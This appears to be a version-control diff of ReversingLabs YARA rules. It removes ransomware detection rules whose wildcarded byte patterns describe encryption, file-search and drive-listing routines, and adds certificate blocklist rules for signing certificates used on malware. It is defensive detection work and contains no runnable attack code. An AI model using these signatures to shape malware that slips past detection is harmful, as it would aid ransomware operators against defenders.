?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 43 ?? E8 ?? ?? ?? ?? EB ?? - 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? - 8D 43 ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - $encrypt_files = { - 8B C0 33 D2 89 50 ?? 89 50 ?? 52 8D 50 ?? 52 FF 70 ?? FF 70 ?? FF 30 E8 ?? ?? ?? ?? - 85 C0 74 ?? 33 C0 C3 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? C3 33 C0 C3 51 8B 50 ?? 85 D2 7E - ?? 33 C9 89 48 ?? 51 8D 4C 24 ?? 51 52 FF 70 ?? FF 30 E8 ?? ?? ?? ?? 85 C0 74 ?? 33 - C0 59 C3 E8 ?? ?? ?? ?? EB ?? FF 30 C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 75 ?? C3 - E8 ?? ?? ?? ?? C3 56 8B F0 33 C0 89 46 ?? 89 46 ?? 8B 46 ?? 2D ?? ?? ?? ?? 74 ?? 48 - 74 ?? 48 74 ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 46 ?? - ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? - BA ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? - ?? ?? ?? 80 7E ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 51 6A ?? 52 50 8D 46 ?? - 50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 06 81 7E ?? ?? ?? ?? ?? 0F 85 ?? ?? - ?? ?? FF 4E ?? 6A ?? FF 36 E8 ?? ?? ?? ?? 40 0F 84 ?? ?? ?? ?? 2D ?? ?? ?? ?? 73 ?? - 33 C0 6A ?? 6A ?? 50 FF 36 E8 ?? ?? ?? ?? 40 0F 84 ?? ?? ?? ?? 6A ?? 8B D4 6A ?? 52 - 68 ?? ?? ?? ?? 8D 96 ?? ?? ?? ?? 52 FF 36 E8 ?? ?? ?? ?? 5A 48 0F 85 ?? ?? ?? ?? 33 - C0 3B C2 73 ?? 80 BC 06 ?? ?? ?? ?? ?? 74 ?? 40 EB ?? 6A ?? 6A ?? 2B C2 50 FF 36 E8 - ?? ?? ?? ?? 40 74 ?? FF 36 E8 ?? ?? ?? ?? 48 75 ?? EB ?? C7 46 ?? ?? ?? ?? ?? 81 7E - ?? ?? ?? ?? ?? 74 ?? 6A ?? EB ?? 6A ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 06 81 7E ?? - ?? ?? ?? ?? 74 ?? FF 36 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 F8 ?? 75 ?? C7 46 ?? ?? ?? ?? - ?? 33 C0 5E C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Certified Software" and pe.signatures[i].serial=="0a:c5:ac:5d:32:31:22:e6:d8:e9:2d:6e:19:1b:14:32" and 1140134400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2433D9Df7Efbccb870Ee5904D62A0101 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "6cd46771-06ea-51c9-ad84-4b28f4f8442b" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13930-L13946" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "92a2effe1b94345f52130e4cb1db181f1990e58eaefb9c74375c14249cc1be22" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 + + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Conpavi AG" and pe.signatures[i].serial=="24:33:d9:df:7e:fb:cc:b8:70:ee:59:04:d6:2a:01:01" and 1322438400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_462Baada57570F70Df76D10B9E7Bf2B7 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "2863a050-ebce-5322-b64a-9160adf6cc21" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13948-L13964" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c48207907339ce3fb7b6bc630097761a24495a9d4e69d421f2bdb36ddc92abcb" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 + + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DVERI FADO, TOV" and pe.signatures[i].serial=="46:2b:aa:da:57:57:0f:70:df:76:d1:0b:9e:7b:f2:b7" and 1551744000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_83320D93Dd8Cf16D11F99B1078B0A7Cb : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "12ce9be9-4644-5b59-aed2-ce4b04fcc46a" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13966-L13984" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "94ec5e05357767cc0c4cd1fc8ff6d1a366359ba699c43f3710204d761e7e707f" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 + + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRANS LTD" and (pe.signatures[i].serial=="00:83:32:0d:93:dd:8c:f1:6d:11:f9:9b:10:78:b0:a7:cb" or pe.signatures[i].serial=="83:32:0d:93:dd:8c:f1:6d:11:f9:9b:10:78:b0:a7:cb") and 1524614400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_10Bae1D20Cb4Cc36A0Ffac86 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "a07d1c35-0026-526a-bf08-e6b07008da03" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13986-L14002" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "44e91fbf4da8e81859a21408ee9f1971f1e8f48d22553fcaa6469156d4a0670b" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 + + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="10:ba:e1:d2:0c:b4:cc:36:a0:ff:ac:86" and 1476773830<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_230716Bfe915Dd6203B2E2A35674C2Ee : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "849c390e-f81f-558e-88a3-19242c127a56" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14004-L14020" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0197ff46ceb1017488da4383436fd0ddc375904f36cc16c5a8ef21d633ec387c" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($search_config_file) and ( all of ($find_files_p*)) and ($track_mouse_event_for_entropy) and ($encrypt_files) and ( all of ($show_ransom_note_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Jiang Liu" and pe.signatures[i].serial=="23:07:16:bf:e9:15:dd:62:03:b2:e2:a3:56:74:c2:ee" and 1472169600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Vhdlocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_36A77D37E68E02Fd3D043C7197E044Ca : INFO FILE { meta: - description = "Yara rule that detects VHDLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "696f8145-342b-5da5-b9ec-6f0d16afc465" - date = "2020-07-15" - modified = "2020-07-15" + id = "721e48fb-3046-5b2d-8ad9-ae340e598794" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.VHDLocker.yara#L1-L152" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "39d1fbfc79d5ea866498bb1e40d2290469df774ce65b1da04a85c0e4e5b4493c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14022-L14038" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fc13ac5880cc2c8eac9ff8d09f6c5c2055b2de54d460a284936a4f6cd78192e8" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "VHDLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 - ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 68 - ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 50 51 E8 ?? ?? - ?? ?? 83 C4 ?? 0B C2 74 ?? 53 FF 15 ?? ?? ?? ?? B0 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 33 DB 8D 95 ?? ?? ?? ?? 53 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 53 50 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ?? - ?? ?? 89 9D ?? ?? ?? ?? 33 F6 8B FF 6A ?? 53 E8 ?? ?? ?? ?? 88 44 35 ?? 46 83 FE ?? - 7C ?? 8D 4D ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D - B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B CE 89 5D ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 8B F4 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? 8B 8D - } - $encrypt_files_p2 = { - 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 57 FF 15 ?? ?? - ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? 32 C0 E9 ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 52 - 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? - ?? ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 6A ?? F7 D8 99 53 52 50 57 FF 15 ?? - ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? - ?? ?? 52 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 50 8D 95 ?? ?? ?? - ?? 52 57 FF D6 85 C0 0F 84 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 81 BD ?? - ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? - ?? ?? ?? 0F 82 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 11 9D ?? ?? ?? ?? - 83 FA ?? 0F 84 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B C3 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 - } - $encrypt_files_p3 = { - 75 ?? 2B C2 6A ?? D1 F8 8D 8D ?? ?? ?? ?? 51 8D 14 00 A1 ?? ?? ?? ?? 52 53 50 FF D6 - 8B 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 52 FF D6 8B 15 ?? - ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 4D ?? 51 52 FF D6 8B 0D ?? ?? ?? ?? 6A - ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 51 FF D6 8B 0D ?? ?? ?? ?? 6A ?? 8D 95 - ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 51 FF D6 EB ?? 8B 9D ?? ?? ?? ?? 6A ?? 33 - C9 51 51 B8 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 DB EB ?? 83 85 ?? ?? - ?? ?? ?? 11 9D ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 50 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 4D ?? 8B 55 - ?? 8B B5 ?? ?? ?? ?? 51 52 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 8D 85 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B D6 52 FF 15 ?? ?? ?? ?? 33 C9 - 51 51 33 C0 51 50 A1 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 FF 15 ?? - ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 94 C0 8B 4D ?? 64 - 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $find_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 68 ?? ?? ?? ?? 33 F6 - 8D 8D ?? ?? ?? ?? 33 C0 56 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 8D 95 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? - 52 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B - ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 57 8D - 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? - ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? E9 - ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? - 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 - } - $find_files_p2 = { - D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 - ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 - C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 BB ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 90 - 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 - ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 - ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? - ?? ?? ?? 57 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? - ?? ?? 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 8B D1 83 C4 ?? 0B D0 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 74 ?? 50 51 8D - 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 C4 ?? 3A C1 75 ?? 01 0D ?? ?? ?? - ?? 11 35 ?? ?? ?? ?? EB ?? 01 0D ?? ?? ?? ?? 11 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 - 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 5E 33 CD - B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $get_logical_drives_list_p1 = { - 8D 85 ?? ?? ?? ?? 50 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D - 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57 - 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? - ?? ?? 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 - A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 - FF 89 7D ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 - ?? 57 8D 8D ?? ?? ?? ?? 2B C2 51 50 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF - ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? - ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? ?? - ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? - ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF 15 - ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 ?? 66 85 - D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB - } - $get_logical_drives_list_p2 = { - 1B C0 83 D8 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 85 ?? ?? - ?? ?? 89 B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE D3 E2 85 95 ?? ?? ?? ?? 0F 84 ?? ?? ?? - ?? 8D 4E ?? 66 89 8D ?? ?? ?? ?? 33 C9 6A ?? 51 8D 95 ?? ?? ?? ?? 52 C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 - ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? - 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? - ?? 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 C4 ?? BF ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 39 78 ?? 72 ?? 8B 00 8D - 50 ?? 8A 08 40 84 C9 75 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 2B C2 50 83 EC ?? B8 ?? ?? ?? - ?? 8B CC 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 39 78 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? - ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 85 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 89 B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 46 89 B5 ?? ?? ?? ?? 83 - FE ?? 0F 8C ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? 8B - 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ( all of ($get_logical_drives_list_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Direct Systems Ltd" and pe.signatures[i].serial=="36:a7:7d:37:e6:8e:02:fd:3d:04:3c:71:97:e0:44:ca" and 1515542400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Hddcryptor : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_73Bff2Fb714F986C1707165F0B0F2E0E : INFO FILE { meta: - description = "Yara rule that detects HDDCryptor ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2c6a8ca3-0f7a-52b7-af6d-74fa9407feca" - date = "2020-07-15" - modified = "2020-07-15" + id = "f014b446-0ddc-51df-898c-200bd60181a0" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.HDDCryptor.yara#L1-L157" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "47915f315bb4956507362f56024f5632cb1bcec569ceaf77fe9d7cb9c25d1d8a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14040-L14056" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d79ab926cbc0049d39f5f4c6e57afc71b1a30311a4816fdb66a9c2e257cc84af" score = 75 quality = 90 - tags = "TC_DETECTION, 